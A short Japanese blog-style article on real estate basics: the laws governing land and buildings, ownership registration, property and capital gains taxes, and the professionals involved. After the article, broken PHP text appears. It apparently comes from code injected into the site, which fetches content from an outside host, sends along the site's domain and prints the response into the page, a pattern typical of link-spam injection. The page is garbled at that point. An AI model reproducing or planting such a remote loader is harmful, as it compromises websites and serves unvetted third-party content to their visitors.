雑学として知っておくと便利な不動産知識

不動産というと一般的に高額で、その取引にあたっては専門知識がないと扱えないという印象があります。実際、日本では不動産、すなわち土地にせよ建物にせよ、様々な法規制がかけられており、たとえ長年にわたり不動産取引に従事している人であっても、そのすべてを適切に把握できるという人はいないのではないでしょうか。例えば、土地に関する代表的な法律を列記してみると、都市計画法、国土利用計画法、宅地造成等規制法といったものがありますし、建物については建築基準法や消防法が関係してきます。さらに土地も建物も、その利用権利、代表的なものは所有権ですが、これを他者に主張するには法務局での登記が必要です。そして、土地や建物に対しては毎年、固定資産税が課税され、これらを譲り渡して利益が出れば、譲渡所得として課税がされてきます。まさに、土地や建物は入手したときから手放すまで、あらゆる場面で必要な知識があります。こうした場面では、司法書士、土地家屋調査士、測量士、建築士、税理士といった、その道のプロが関わります。土地や建物は所有するにせよ借り受けるにせよ、人生で接点を持つ場面はありますから、雑学としてでも知っておくと良いと思います。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿